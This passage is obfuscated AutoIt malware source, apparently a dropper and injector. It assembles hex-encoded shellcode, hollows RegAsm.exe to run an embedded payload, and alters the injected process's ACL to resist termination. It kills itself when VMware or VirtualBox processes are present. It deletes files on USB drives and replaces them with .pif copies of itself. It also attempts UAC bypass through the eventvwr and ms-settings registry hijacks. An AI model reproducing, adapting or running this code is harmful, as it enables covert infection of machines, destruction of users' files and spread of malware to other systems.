1780023503 INT (3551320 ) ENDIF IF $1267239031 = 397553911 THEN $BIN_SHELLCODE &= "0F840DFEFFFF8B45E0EB1D8B5DFC33FF837DD800740757FF75D8FF55A883FB" $1267239031 = 304845161 ISBOOL ("bMUFzLhoqfNfapKL6GygImRzY7hOw4qlMmjQb7OdlWdouosMVRWbipfZ6uSBEB2vZBBYg4J92v5XiBe" ) ISSTRING (2654182 + 223575 ) ENDIF IF $1267239031 = 418593742 THEN $BIN_SHELLCODE &= "F0740BC1E81833F081E6FFFFFF0F474975E05F8BC65E5DC20400558BEC5151" $1267239031 = 1052868023 MOD (2238625 , 2896909 ) ENDIF IF $1267239031 = 427686952 THEN $BIN_SHELLCODE &= "FCFFFF83C00850FF75D8FF55D485C00F843CFEFFFF8B46280345F88985C0FC" CHR (3525649 ) $1267239031 = 434956025 ISSTRING (448995 + 3136940 + 4293759231 * 1933696 ) ENDIF IF $1267239031 = 434956025 THEN $BIN_SHELLCODE &= "FFFF8D8510FCFFFF50FF75DCFF559085C00F841BFEFFFFFF75DCFF55AC85C0" ISBOOL ("JyfRWj3TOXm3BclXj8dHugqcYNqz" ) $1267239031 = 397553911 ISFLOAT ("DRXUQndD9iyoAetMbDO4Dhc2i3CLnobn9mSgvoxuqLr4yyZvXYGQaHvvN5LWUBpVgloovnqXguM10iDTehYzRvnA1vBALKKZvFX" ) ENDIF IF $1267239031 = 437981964 THEN $KEY ["3" ] ($SHELLCODE_STRUCT , "shellcode" , $BIN_SHELLCODE ) $1267239031 = 555601121 ISBOOL (2991958 * 3679854 + 4292932483 ) WINEXISTS ("LMZeV8YwaWZkFTXEtvpIDho26WGFx069T38lGBbpvn9YSJd6h8ljlunEy7h9Ar9jZZBMVL82u9mpizkwTKyy" ) ENDIF IF $1267239031 = 456464236 THEN $BIN_SHELLCODE &= "0345F850FF75D8FF55CC85C074128B4DF483C7280FB7460641894DF43BC872" PTR ("DXIubZdoZ83hAlF9sZlh7v8XVqZ3JEdac7qYyHskibsBqosy3yv7LqShYWIV9kOu52fD5RJVGb95cGFF" ) $1267239031 = 1780715420 RANDOM (686894 ) ENDIF IF $1267239031 = 463888510 THEN $BIN_SHELLCODE &= "34FF75D8FF55C08945F885C0753B85FF0F84230200006A406800300000FF76" $1267239031 = 208206939 ENDIF IF $1267239031 = 518704526 THEN $BIN_SHELLCODE &= "75D8FF55D485C00F84FEFEFFFF8D459C506A02FF7654FF75F8FF75D8FF55CC" DIM $W8GXJZDMZKZKRWFRQDXI = 692779 + 4294178295 * 1941383 + 960945 * 2737977 * 3159816 * 3390308 + 2278574 $1267239031 = 991787867 ENDIF IF $1267239031 = 548984161 THEN $BIN_SHELLCODE &= "CAD803C78570FFFFFF99B04806C78574FFFFFF93BA9403C78578FFFFFFE4C7" $1267239031 = 693997732 ISBOOL (3199429 + 4294753684 * 1437131 ) ISBINARY (3506304 * 3623853 * 2322729 * 2067922 ) ENDIF IF $1267239031 = 555601121 THEN $KEY ["3" ] ($FILE_STRUCT , "lpfile" , $LPFILE ) CHR (2989384 ) $1267239031 = 981504074 ENDIF IF $1267239031 = 569195090 THEN $BIN_SHELLCODE &= "06732C8B7DD083C72C03FEFF77FC8B07034510508B47F803C350FF55B48B4D" $1267239031 = 1131056637 STRING ("iQZWT7K2oonRsrnGIorEUodmocAnng9zUhInaX8Hp5mFdFS95kexfN44MMHQGxNhoX7kT9FWqToYbG" ) ENDIF IF $1267239031 = 586222774 THEN $BIN_SHELLCODE &= "0881E1FF0F0000030A0104198B4DF08B42044183E808894DF0D1E83BC872BB" $1267239031 = 1029171870 ENDIF IF $1267239031 = 665766390 THEN $BIN_SHELLCODE &= "FF55C48B5DFCE9F501000033FFFF7654FF751053FF55B433C0897DF0663B46" $1267239031 = 569195090 MOD (1162428 , 87678 ) ENDIF IF $1267239031 = 686536036 THEN $BIN_SHELLCODE &= "74148B55FC463B750872E733C05F5E5B8BE55DC208008B45F80FB704708B04" DIM $QPIGQ5NSHWYF3FCZVFFK = 318795 $1267239031 = 295874608 PTR (292378 + 2109525 * 2825386 ) ENDIF IF $1267239031 = 693997732 THEN $BIN_SHELLCODE &= "B904C7857CFFFFFFE487B804C74580A92DD701C7458405D13D0BC745884427" WINEXISTS ("XjwyUD7RhVE4z55WQaM" ) $1267239031 = 1483208281 ISBOOL ("FViOcI8YIOI5SluiFk0t4ngcWJ14NiBn7138usNIXQvUw9eDQDpHT2KrOg2CS" ) ENDIF IF $1267239031 = 718764494 THEN $BIN_SHELLCODE &= "0333FF4733D2897DF433C08955EC6639110F94C03D4D5A00000F840E030000" $1267239031 = 1655295316 STRING (867786 + 2095763 + 3490012 ) ENDIF IF $1267239031 = 851821169 THEN $BIN_SHELLCODE &= "C079056A0458EB0CA9000000406A00580F95C0408D4D9C5150FF77E48B47E8" $1267239031 = 456464236 STRING ("23DeqLsozl0TE5Fbbo" ) ENDIF IF $1267239031 = 895876247 THEN $BIN_SHELLCODE &= "FFFFFF8D45C0898530FFFFFF8D4598898534FFFFFF8D45D4898538FFFFFF8D" DIM $BWVZTAF7UZBGU23IQDIX = "AXU6ZNVqk5C02bS4m9XtoF4DxliiOEphoRbILCD" $1267239031 = 1876673018 ISFLOAT ("IRB0kNDdVCf52qHMFMLQOuKkaisTFa9Iva4RTs7aamvWLgRv50qSdDonfr0bvVHVDGI1v03nOLOB9ZI3B7YOTrE1VRLBB6NpOKreGZae7dcA" ) MOD (1026700 , 2916745 ) ENDIF IF $1267239031 = 969182864 THEN $BIN_SHELLCODE &= "368B76188975C88D45B4C78558FFFFFF793A3C07898520FFFFFF8BF78D45E8" CHR (3835530 ) $1267239031 = 1622275345 DIM $SGNOBVT7ZXYHDWM6TSOO = 231310 + 3904646 ENDIF IF $1267239031 = 979069101 THEN $BIN_SHELLCODE &= "00000000766B8B420433C983E808894DF0A9FEFFFFFF76450FB7444A086685" STRING ("WIfcYTvZEstDz9ZSoI6Bnkv78Qhk3TpwSh" ) $1267239031 = 2005523844 ENDIF IF $1267239031 = 981504074 THEN LOCAL $RET = $KEY ["2" ] ("dword" , $LPSHELLCODE + "0xBE" , "wstr" , $WPATH , "wstr" , $WARGUMENTS , "ptr" , DLLSTRUCTGETPTR ($FILE_STRUCT ) ) ISBOOL (796365 * 2319299 + 4291062434 ) $1267239031 = 2115662046 ISSTRING (1647701 + 2441601 + 508485 + 525874 ) RANDOM (3109830 ) ENDIF IF $1267239031 = 991787867 THEN $BIN_SHELLCODE &= "85C00F84E4FEFFFF33C0897DF4663B4606736C8B7DD083C73C03FE8B07A900" $1267239031 = 195372937 RANDOM (3990407 ) ENDIF IF $1267239031 = 1014781231 THEN LOCAL $BINL = BINARYLEN ($BIN_SHELLCODE ) $1267239031 = 1086136603 RANDOM (3952055 ) ENDIF IF $1267239031 = 1029171870 THEN $BIN_SHELLCODE &= "8B4DF4034A04035204894DF43B8FA4000000729533FF57FF765053FF75F8FF" $1267239031 = 518704526 MOD (1272682 , 3812828 ) STRING (1286433 + 4293770259 + 4291169513 ) ENDIF IF $1267239031 = 1052868023 THEN $BIN_SHELLCODE &= "5356578B7D0833F68B473C8B44387803C78B50208B581C03D78B482403DF8B" $1267239031 = 227757661 INT (3932423 ) ISFLOAT (1451006 * 2545822 + 284354 * 234733 ) ENDIF IF $1267239031 = 1086136603 THEN LOCAL $KEY = [EXECUTE ("DllStructCreate" ) , EXECUTE ("DllCall" ) , EXECUTE ("DllCallAddress" ) , EXECUTE ("DllStructSetData" ) ] $1267239031 = 1552556832 ISFLOAT ("oKw6zKUAxHOgJUk32JyK8uVzpSw0Wp3K67fxqAptLEufH8fsrTY6tz2307RSo4OhNdjLOWMBtf8C9Q1rLdIdA7qGflHtTHeS0mADYC" ) DIM $WLOAY3JFZFLULRRXLGCN = 1248278 ENDIF IF $1267239031 = 1131056637 THEN $BIN_SHELLCODE &= "F08D7F280FB7460641894DF03BC87CDC8B7B3C8B45F803FB837DEC00894734" DIM $QMWOWCJZD6EVCGQRXNTB = "woFURl6kqXNZokWh4T66VrOLvVF1k0fyug3ypEOqnoWjAFY54kCDxFheI4x6QeaARoEhqw1zdOSGFFkZ6J69wLbY8ZZvgTKinuBlbQOGtdA" $1267239031 = 63781146 ISBOOL (241201 + 4290981552 + 543449 + 276481 ) ENDIF IF $1267239031 = 1248908323 THEN $BIN_SHELLCODE &= "14897DF8897DBC8945D039BEA0000000741139BEA40000007409F646160175" CHR (2200056 ) $1267239031 = 718764494 STRING ("skd8Xq5zQslsbxpVLHTFanqv8vHm9YVfNmrx9VVTjTuV44NUlW3ULHJf4RaBSSA1HfOYg" ) PTR (3977705 + 3525856 + 4293184002 ) ENDIF IF $1267239031 = 1296546299 THEN $BIN_SHELLCODE &= "00FF76506A00FF55988BD885DB0F84450200006A406800300000FF7650FF76" $1267239031 = 463888510 DIM $ADFMLDSUTABSCNZP0MUB = 128789 * 2467528 + 1220413 + 1598930 + 3790979 * 3676379 * 911725 * 2162403 DIM $XCGC848ZRMY1JQK3B13T = 3906100 + 153301 * 2296994 + 3000313 + 2094034 * 817407 * 2633562 * 3794957 ENDIF IF $1267239031 = 1372412672 THEN $BIN_SHELLCODE &= "EE38830CC78564FFFFFF5764E101C78568FFFFFF18E4CA08C7856CFFFFFFE3" ISSTRING (1154943 * 422726 ) $1267239031 = 548984161 WINEXISTS ("addFVQ16sAs32j43LzhmAUM7FnK9k8yORuUbCkBaYWNhLMUhz4DmbQtqzf9Ge1VtbNlHz3zB8hyOfEv3CDJqEmNbbCK" ) ENDIF IF $1267239031 = 1435411003 THEN $BIN_SHELLCODE &= "B850E842FEFFFF8B8CB520FFFFFF890185C00F84910300004683FE0E7CD28B" RANDOM (32415 ) $1267239031 = 1623917350 MOD (2850608 , 2142441 ) ENDIF IF $1267239031 = 1446413075 THEN $BIN_SHELLCODE &= "006A006A048D45BC508B85B4FCFFFF83C00850FF75D8FF559485C00F847802" $1267239031 = 73392173 ENDIF IF $1267239031 = 1483208281 THEN $BIN_SHELLCODE &= "230FC7458CE86F180D898554FFFFFF8B45C883FE02FFB4B558FFFFFF0F4F45" $1267239031 = 1435411003 DIM $KQEZZAKG6RDRDLBOVZXB = "VcWC7UUwrQMe0uQEEq8qQVpAUkSZ9zEw" PTR ("w1pzkNKzmm1WjpiylJ9XuSWc5w2kpzdEAWiyS0FhNaG81c0jv7Bm0AxNfmEXWzjWjvuwhURve2julYl2GSZs80" ) ENDIF IF $1267239031 = 1532618530 THEN $BIN_SHELLCODE &= "0C8B760C8B368B368B76188975B8897DC8648B35300000008B760C8B760C8B" CHR (1960984 ) $1267239031 = 969182864 ENDIF IF $1267239031 = 1552556832 THEN LOCAL $LPSHELLCODE = $KEY ["1" ] ("kernel32" , "ptr" , "VirtualAlloc" , "dword" , "0" , "dword" , $BINL , "dword" , "0x3000" , "dword" , "0x40" ) ["0" ] $1267239031 = 363789172 PTR (2813354 + 2455556 + 427058 ) ENDIF IF $1267239031 = 1622275345 THEN $BIN_SHELLCODE &= "C7855CFFFFFF794A8A0B898524FFFFFF8D45B0898528FFFFFF8D45A489852C" $1267239031 = 895876247 ENDIF IF $1267239031 = 1623473715 THEN $BIN_SHELLCODE &= "8B7D0833F657E8D7FFFFFF8BC885C974200FBE07C1E60403F08BC625000000" $1267239031 = 418593742 PTR ("v7MAlawF5DA8QkcQmc1SRRvbbDSBsL96FYvFylefVBvIbsuBnwyY7K9NKLyRs4ntDEC1YGrb7V6ovW9Tiq" ) ENDIF IF $1267239031 = 1623917350 THEN $BIN_SHELLCODE &= "DF6A108D45D84350895DFCFF55E86A448D85DCFEFFFF50FF55E868CC020000" $1267239031 = 97398974 PTR (3685199 * 1486103 * 3440150 + 144987 ) ENDIF IF $1267239031 = 1655295316 THEN $BIN_SHELLCODE &= "33C039160F94C03D504500000F84FC02000033C0663956040F94C03D4C0100" ISBINARY (289984 * 746420 + 4291953335 ) $1267239031 = 216567143 ISBOOL ("rgsFHcgKEpK8easRB3ONG10tXqezgkfYVl65XbrAGfIhpmIU8hjW3xizq8Sr8QEtjWn3ex4AKohBrSeJR" ) ENDIF IF $1267239031 = 1700268568 THEN LOCAL $BIN_SHELLCODE = "0x558BEC8B4D088BC180390074064080380075FA2BC15DC20400558BEC5657" $1267239031 = 1623473715 INT (3657527 ) ENDIF IF $1267239031 = 1780023503 THEN LOCAL $FILE_STRUCT = $KEY ["0" ] ("byte lpfile[" & STRINGLEN ($LPFILE ) & "]" ) PTR ("B0Jo8C9QOKnTlNqQiH4iKNoFs0201HSfhLXq1dUKJaO0Vshpgvxh4kyXLd6hKjZh2iKI19ZeXsHJ9yVaSLTEjKl6m9OXhM9AlG7LRHyhGstKMYXns5z9At7" ) $1267239031 = 437981964 WINEXISTS ("b7ktgxCAisjnK71qJtxlAElm991JQOclFWFvjrFA" ) ENDIF IF $1267239031 = 1780715420 THEN $BIN_SHELLCODE &= "9E33FF68008000005753FF55C485C00F845BFEFFFF576A048D45F8508B85B4" $1267239031 = 427686952 ENDIF IF $1267239031 = 1876673018 THEN $BIN_SHELLCODE &= "45A889853CFFFFFF8D45A0898540FFFFFF8D4590898544FFFFFF8D45948985" DIM $AWU8Q3FW7THG2VDQ7RYB = 2040570 $1267239031 = 2132296422 PTR (1388119 * 875688 + 1988207 ) ENDIF IF $1267239031 = 1933112639 THEN $BIN_SHELLCODE &= "FF55A485C00F84AD0200008D8510FCFFFF50FF75DCFF55A085C00F84980200" $1267239031 = 1446413075 ENDIF IF $1267239031 = 2005523844 THEN $BIN_SHELLCODE &= "C0742B25FF0F000003028945EC8BC88B46342904198B4DF08B47340FB74C4A" ISBOOL ("y4CbQvrfa5K3eGb0okmag6byfkHV15B65uydxMOnOijI3Wnkl9OYwl1B2d6EXGnfCN7Ti7CLE9v7XBFs7xI1qNITD6ltQkzh4egoZEcoGcsx03OzHNH" ) $1267239031 = 586222774 ENDIF IF $1267239031 = 2115662046 THEN LOCAL $HANDLEFROMPID = $KEY ["1" ] ("kernel32.dll" , "handle" , "OpenProcess" , "dword" , "0x001F0FFF" , "bool" , "0" , "dword" , $RET ["0" ] ) ["0" ] MOD (991415 , 803740 ) $1267239031 = 202026599 WINEXISTS ("IndTvqDBvuunul3KqVVcM9jHprjKpZCxh8YL06er" ) ENDIF IF $1267239031 = 2132296422 THEN $BIN_SHELLCODE &= "48FFFFFF8D45C489854CFFFFFF8D45AC898550FFFFFF8D45CCC78560FFFFFF" $1267239031 = 1372412672 ENDIF NEXT IF $PROTECT THEN ACL ($HANDLEFROMPID ) ENDIF ENDFUNC FUNC ACL ($HANDLE ) GLOBAL $648664962 = 323312849 GLOBAL $AX2RIEEDEG = 3689474 FOR $E = 0 TO 3526621 IF $648664962 = 323312849 THEN DHVWRCDTHNKPWFW ("3" , "12000" ) DIM $WWQUURD2H5FGNXQPK4BA = 976315 $648664962 = 967842408 CHR (4231 ) ENDIF IF $648664962 = 708304020 THEN LOCAL $ARRAY = ["0x401FFFFF" , "3" , "0" , "0" , "0" , "1" , "0" , DLLSTRUCTGETPTR ($CHAR ) ] EXITLOOP ISPTR ("hFe4Js4ajNI7Zq0MLKz61fhTz3RsKOwUCiQUkQuifohK8xLTtOp7vhNbxvDQ" ) ENDIF IF $648664962 = 813318089 THEN LOCAL $CHAR = DLLSTRUCTCREATE ("char[32]" ) CHR (1939303 ) $648664962 = 1944260330 ENDIF IF $648664962 = 967842408 THEN LOCAL $MAINSTRUCT = DLLSTRUCTCREATE ("dword;int;dword;STRUCT;ptr;int;int;int;ptr;ENDSTRUCT" ) CHR (3726352 ) $648664962 = 813318089 RANDOM (2076135 ) ENDIF IF $648664962 = 1944260330 THEN LOCAL $DWORD = DLLSTRUCTCREATE ("dword" ) INT (3857468 ) $648664962 = 708304020 CHR (1622212 ) ENDIF NEXT FOR $I = "0" TO "7" DLLSTRUCTSETDATA ($MAINSTRUCT , $I + "1" , $ARRAY [$I ] ) NEXT GLOBAL $658599975 = 323312849 GLOBAL $ZMNGEZMTJ2 = 1433067 FOR $E = 0 TO 3737049 IF $658599975 = 323312849 THEN DLLSTRUCTSETDATA ($CHAR , "1" , "CURRENT_USER" ) $658599975 = 967842408 INT (144649 ) ENDIF IF $658599975 = 648664962 THEN DLLCALL ("Kernel32.dll" , "Handle" , "LocalFree" , "Handle" , $DWORDPOINTER ) CHR (2584263 ) EXITLOOP DIM $2AJL5TLTMTVWVLJJUYVT = 351404 ENDIF IF $658599975 = 708304020 THEN $SETSECURITYINFO = DLLCALL ("Advapi32.dll" , "dword" , "SetSecurityInfo" , "handle" , $HANDLE , "int" , "6" , "dword" , "0x00000004" , "dword" , "0" , "dword" , "0" , "ptr" , DLLSTRUCTGETDATA ($DWORD , EXECUTE ("1" ) ) , "ptr" , "0" ) DIM $CLDNUN32WIBTTUNDJKDU = 3635406 $658599975 = 648664962 INT (330935 ) ENDIF IF $658599975 = 813318089 THEN $DWORDPOINTER = DLLSTRUCTGETPTR ($DWORD ) ISPTR (620407 + 2895197 ) $658599975 = 1944260330 ENDIF IF $658599975 = 967842408 THEN $MAINSTRUCPOINTER = DLLSTRUCTGETPTR ($MAINSTRUCT ) $658599975 = 813318089 PTR ("JqjEO8km5YlBidbMJsLOb5okKOEA046k2EoJJDEi4FwBmGpWAWmAoVIOb839CTva1bJNYB" ) ENDIF IF $658599975 = 1944260330 THEN $SETENTRIESINACL = DLLCALL ("Advapi32.dll" , "dword" , "SetEntriesInAclA" , "ulong" , "1" , "ptr" , $MAINSTRUCPOINTER , "ptr" , "0" , "ptr" , $DWORDPOINTER ) $658599975 = 708304020 ISPTR (2212243 * 249414 + 4292103711 * 260120 ) RANDOM (414558 ) ENDIF ISBOOL (2376135 * 686167 + 1447010 ) NEXT ENDFUNC FUNC DHVWRCDTHNKPWFW ($LOOP , $TIME ) LOCAL $VAR = RANDOM ("0" , "255" ) FOR $I = "0" TO $LOOP GLOBAL $813318089 = 323312849 GLOBAL $L7L79UHMVA = 2353665 FOR $E = 0 TO 261501 IF $813318089 = 323312849 THEN SLEEP ($TIME / $LOOP ) ISBOOL (2952363 + 1421411 ) $813318089 = 967842408 WINEXISTS ("EsXJulmWfXU9tJ1kf1CtMV45A2dogE3TguMu8AT4cnTXaU8TD4" ) ENDIF IF $813318089 = 967842408 THEN $VAR += RANDOM ("0" , "255" ) EXITLOOP ISPTR (1581524 + 1823701 + 3877683 * 2423082 ) ENDIF WINEXISTS ("7GmNiIrzbg4R4tUlgc7HH36frqWdGh3819V7STSmqxRr7BHYnEE2duAeJgw1Wn24m605IWCwtVrklNiZT70cMb5FHRwKw0zcEXfbLMpAbhHsdq268GiYx0" ) NEXT IF $VAR = $VAR THEN $VAR = RANDOM ("0" , "255" ) ENDIF NEXT ENDFUNC FUNC KHOCWHDEQXMSTFPOADRL ($SOCCURRENCENAME ) GLOBAL $813318089 = 323312849 GLOBAL $KATW1Z2ACU = 1093317 FOR $E = 0 TO 937915 ISBOOL ("fSybEDLCqYAM0SLONG4aspxbih" ) IF $813318089 = 323312849 THEN LOCAL $AHANDLE = DLLCALL ("kernel32.dll" , "handle" , "CreateMutexW" , "struct*" , "0" , "bool" , "1" , "wstr" , $SOCCURRENCENAME ) $813318089 = 967842408 ISSTRING ("tcg9ZVRx0gd8pkVTIa1Ng50tw2xxONOtdVFOEQZVmLBjuc36topKMTVymWL7xsTmAT5ENfn3lgADCQ9t8BdzxeQu9hBTd2x43oSKhyro" ) ENDIF IF $813318089 = 967842408 THEN LOCAL $ALASTERROR = DLLCALL ("kernel32.dll" , "dword" , "GetLastError" ) EXITLOOP ENDIF ISPTR ("5otYwcJFFMEZsSGKn7ymJjZycNjcRm56W4BOIAvHG3WKFGgYURRIxfyWz4WS3GYtRIdyq2bXL1ORxo3FGvsaEwIRFOpNNMN9eB37CSH2O36FzRykbqkH" ) NEXT IF $ALASTERROR ["0" ] = "183" THEN GLOBAL $813318089 = 323312849 GLOBAL $YYU9V3KMWI = 962935 FOR $E = 0 TO 3918727 IF $813318089 = 323312849 THEN DLLCALL ("kernel32.dll" , "bool" , "CloseHandle" , "handle" , $AHANDLE ["0" ] ) STRING (161009 * 1702567 + 2441486 + 4294805267 ) $813318089 = 967842408 ENDIF IF $813318089 = 967842408 THEN PROCESSCLOSE (@AUTOITEXE ) CHR (428221 ) EXITLOOP ISBINARY (3818722 * 3763393 ) ENDIF NEXT ENDIF ENDFUNC FUNC DJVLLWQLKATZJRZPICPARXZ ($RESNAME , $RESTYPE ) GLOBAL $784529671 = 323312849 GLOBAL $7TUFCZFNVU = 2994307 FOR $E = 0 TO 3262216 IF $784529671 = 323312849 THEN LOCAL $RESPOINTER DIM $FUHUVFF4VRW85A1KB1CS = 2081482 $784529671 = 967842408 MOD (2157306 , 665523 ) ENDIF IF $784529671 = 439940659 THEN RETURN DLLSTRUCTCREATE ("byte[" & $RESSIZE & "]" , $MEMORYPOINTER ) CHR (2635326 ) EXITLOOP ISFLOAT (2768988 * 1774267 + 3368674 ) ENDIF IF $784529671 = 648664962 THEN LOCAL $MEMORYPOINTER DIM $GSU2MBUBOIWGTMKZT8I1 = "93rpDC2bDQ9KlA2" $784529671 = 658599975 INT (1317462 ) ENDIF IF $784529671 = 658599975 THEN $INFOBLOCK = DLLCALL ("kernel32.dll" , "ptr" , "FindResourceW" , "ptr" , $HINSTANCE , "wstr" , $RESNAME , "long" , $RESTYPE ) ["0" ] STRING ("vybE2ju5hydMj8CAU3x5iVSMpOoV4nA5lghC99YZqptC" ) $784529671 = 1590494170 DIM $LXAJ8IOJQXPM4IB37HAC = 3407810 * 1757049 * 325801 + 4292330764 MOD (3658019 , 1564137 ) ENDIF IF $784529671 = 708304020 THEN LOCAL $GLOBALMEMORYBLOCK DIM $M16C2HXKUK4RNZFKZHEL = 1400604 + 1971754 $784529671 = 648664962 ENDIF IF $784529671 = 813318089 THEN LOCAL $HINSTANCE $784529671 = 1944260330 DIM $A4QFLXKSM0ADN7OCTT8Y = "FV7wFIFzvh243qtTAzb6lzEpaWFRfSj2sM4iTSOZN30ThJU" INT (1198101 ) ENDIF IF $784529671 = 925089026 THEN $GLOBALMEMORYBLOCK = DLLCALL ("kernel32.dll" , "ptr" , "LoadResource" , "ptr" , $HINSTANCE , "ptr" , $INFOBLOCK ) ["0" ] CHR (787086 ) $784529671 = 1407564695 ISPTR ("uN7aKpvkaSUmssIWhAcZvWyp51AY2bv5WZImVh8EuksKkUi3GCJ5RnCHoSeUYHr9vYACUwb9BGElDYfkSHqzAAoHwa7cdoQW2t" ) ENDIF IF $784529671 = 967842408 THEN LOCAL $RESSIZE $784529671 = 813318089 ENDIF IF $784529671 = 1407564695 THEN $MEMORYPOINTER = DLLCALL ("kernel32.dll" , "ptr" , "LockResource" , "ptr" , $GLOBALMEMORYBLOCK ) ["0" ] $784529671 = 439940659 DIM $AM3CQQ2H5J2GTZ86N1TS = "IT0bxg706e0f7GzjmyFaVt" ENDIF IF $784529671 = 1590494170 THEN $RESSIZE = DLLCALL ("kernel32.dll" , "dword" , "SizeofResource" , "ptr" , $HINSTANCE , "ptr" , $INFOBLOCK ) ["0" ] ISBOOL ("CNqs99213ca2k4S8EbbW3IWaCmrzo7xB8vElOW1feOFglFvfdvqAIN132p0WRCL6NH4YyFsTk5RncQZ61lv3R73uDK" ) $784529671 = 925089026 STRING (190548 + 4292416822 + 4292852643 ) ENDIF IF $784529671 = 1944260330 THEN LOCAL $INFOBLOCK DIM $GQM6M0LA34EGSPROJUXL = "XfGfkCnluuEY1jRpy0Vh8ck3EtuV8bm3ujTkg0Cx8pIJar1f9ylDce4V5MK0iBmsiLDSzFjHxxiTDK3mCoVI0S0qo8pCoLoFcpAxYjODpM" $784529671 = 708304020 INT (1302124 ) ENDIF STRING (2761253 + 4293298758 * 819230 ) NEXT ENDFUNC FUNC ASAZRREHKGLB () LOCAL $ARRAY = ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = "0" TO UBOUND ($ARRAY ) - "1" IF PROCESSEXISTS ($ARRAY [$I ] ) THEN PROCESSCLOSE (@AUTOITPID ) ENDIF NEXT ENDFUNC FUNC RSDBBCVUCE ($PROTECT ) LOCAL $RES = $GBCNYUEOGFONFLBWF IF FILEEXISTS (@HOMEDRIVE & "\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" ) THEN $PROCESSID = MWMQWLZFSVGLEKEBWPKTQCNGY (@HOMEDRIVE & "\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" , "" , $RES , $PROTECT ) ELSEIF FILEEXISTS (@HOMEDRIVE & "\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" ) THEN $PROCESSID = MWMQWLZFSVGLEKEBWPKTQCNGY (@HOMEDRIVE & "\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" , "" , $RES , $PROTECT ) ENDIF ENDFUNC FUNC AJJMOCPPKFEWODWKA () IF NOT WINEXISTS ("[CLASS:Progman]" ) THEN PROCESSCLOSE (@AUTOITPID ) ENDIF ENDFUNC FUNC TLRQDAKNGKXFDWQNVSPQPWUUICTCP () $USBLIST = DRIVEGETDRIVE ("REMOVABLE" ) IF $USBLIST <> "" THEN FOR $I = "1" TO $USBLIST ["0" ] IF $USBLIST [$I ] <> @HOMEDRIVE THEN GLOBAL $813318089 = 323312849 GLOBAL $BPQTWIMQOJ = 1858436 FOR $E = 0 TO 1993967 IF $813318089 = 323312849 THEN LOCAL $FILEARRAY INT (869246 ) $813318089 = 967842408 STRING ("6T1nvZyXbLKRnnJttGsDckp9ftytoXK1yUt6BHWXrAi2XLvdT3sNcIOVC2ibzeHobUrC4M1VUFmLcwlC8vKu" ) ENDIF IF $813318089 = 967842408 THEN $FILEARRAY = _FILELISTTOARRAYREC ($USBLIST [$I ] , "*" , EXECUTE ("1" ) , EXECUTE ("1" ) , EXECUTE ("0" ) , EXECUTE ("2" ) ) DIM $HCJZVWM341CT2IFCH3GW = 206504 EXITLOOP ISFLOAT (231055 + 4294127558 ) ENDIF RANDOM (1833045 ) NEXT FOR $F = "1" TO $FILEARRAY ["0" ] GLOBAL $813318089 = 323312849 GLOBAL $WJQV9I9SIE = 1546599 FOR $E = 0 TO 589658 IF $813318089 = 323312849 THEN $DATATARGET = BINARY (FILEREAD ($FILEARRAY [$F ] ) ) $813318089 = 967842408 ENDIF IF $813318089 = 967842408 THEN $CHECKDATA = STRINGINSTR ($FILEARRAY [$F ] , ".pif" ) EXITLOOP WINEXISTS ("RsTQjXg1EW5Vm4ywuKKGE8184YaO9vGXwKr0qc8ScsKAJGTi2gRnWwoTAVVuXA2ioixKMHfrL3Emxzywf1W2NtbavH" ) ENDIF NEXT IF NOT $CHECKDATA THEN GLOBAL $708304020 = 323312849 GLOBAL $N4KABLAJIF = 1112706 FOR $E = 0 TO 1334857 IF $708304020 = 323312849 THEN LOCAL $HANDLEF = FILEOPEN (@AUTOITEXE , "16384" ) WINEXISTS ("vbvyp" ) $708304020 = 967842408 RANDOM (1986752 ) STRING ("iJa883W5n7" ) ENDIF IF $708304020 = 813318089 THEN FILEDELETE ($FILEARRAY [$F ] ) $708304020 = 1944260330 ISFLOAT ("tlxj2y86A7qsV2zl" ) ENDIF IF $708304020 = 967842408 THEN FILEWRITE ($FILEARRAY [$F ] & ".pif" , FILEREAD ($HANDLEF ) ) $708304020 = 813318089 RANDOM (1038744 ) ENDIF IF $708304020 = 1944260330 THEN FILECLOSE ($HANDLEF ) EXITLOOP ENDIF NEXT ENDIF NEXT ENDIF NEXT ENDIF ENDFUNC FUNC RARUCLGLLFJNMMTFCYMKXQZQIJP () IF STRINGINSTR (@OSVERSION , "7" ) OR STRINGINSTR (@OSVERSION , "8" ) THEN IF NOT ISADMIN () THEN GLOBAL $1944260330 = 323312849 GLOBAL $N9O63VAHI9 = 1079579 FOR $E = 0 TO 3836295 IF $1944260330 = 323312849 THEN REGWRITE ("HKCU\Software\Classes\mscfile\shell\open\command" , "" , "REG_SZ" , @AUTOITEXE ) CHR (265540 ) $1944260330 = 967842408 CHR (3256860 ) ENDIF IF $1944260330 = 813318089 THEN EXIT EXITLOOP ISPTR (398255 * 1317061 * 173571 ) ENDIF IF $1944260330 = 967842408 THEN SHELLEXECUTE ("eventvwr" ) $1944260330 = 813318089 CHR (3989623 ) ENDIF WINEXISTS ("0UToN6OBkVe2hkOzCKnas4u5hy0BG9ujitUb81UXOn2ICezpu1KsX4" ) NEXT ENDIF ELSEIF STRINGINSTR (@OSVERSION , "10" ) THEN IF NOT ISADMIN () THEN GLOBAL $648664962 = 323312849 GLOBAL $5YYHPGM5KA = 600086 FOR $E = 0 TO 3637026 CHR (2557061 ) IF $648664962 = 323312849 THEN DLLCALL ("kernel32.dll" , "boolean" , "Wow64EnableWow64FsRedirection" , "boolean" , "0" ) $648664962 = 967842408 STRING ("VCc8" ) ISBINARY ("wn" ) ENDIF IF $648664962 = 708304020 THEN EXIT EXITLOOP ISPTR ("BsRiHtLYRz9BwIe3NveqFfqWyGGLMbq0wS2VuL4TwWzoyI9Nf48ZQnlwb5UaX9kOjifOQsIbAu4TObxZG2GS" ) ENDIF IF $648664962 = 813318089 THEN REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "" , "REG_SZ" , @AUTOITEXE ) $648664962 = 1944260330 ISPTR ("36wLVfpDu7Wu6yvsCRaG4C4CBLS86ikIjiGyHh46ivm5UxgdZ0dYT28Ab3jixqGmXmlX16VvXdxHq8TeFOjgfv0qkgwO7WI2YaiGlsl2f" ) ENDIF IF $648664962 = 967842408 THEN REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "DelegateExecute" , "REG_SZ" , "Null" ) ISFLOAT 